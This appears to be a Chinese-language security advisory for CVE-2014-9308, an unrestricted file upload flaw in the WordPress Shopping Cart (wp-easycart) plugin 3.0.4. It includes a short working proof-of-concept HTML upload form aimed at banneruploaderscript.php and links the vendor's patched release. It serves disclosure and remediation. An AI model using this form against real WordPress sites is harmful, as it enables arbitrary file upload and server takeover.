发布日期:2015-01-09
更新日期:2015-01-14
受影响系统:
WordPress Shopping Cart 3.0.4
描述:
BUGTRAQ ID: 71983
CVE(CAN) ID: CVE-2014-9308
WordPress Shopping Cart插件是购物车系统,具有电子交易功能和管理工具。
WordPress Shopping Cart 3.0.4及其他版本在实现上存在不受限制文件上传漏洞,由于banneruploaderscript.php内存在不正确的if语句,任何注册的用户都可以上传任意文件。攻击者可利用此漏洞上传任意文件到受影响计算机。
<*来源:Kacper Szurek
链接:
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Kacper Szurek ()提供了如下测试方法:
Login as regular user (created using wp-login.php?action=register):
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" value="1">
<input type="file">
<input value="Upload!" type="submit">
</form>
File will be visible:
%filename%_1.%fileextension%
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip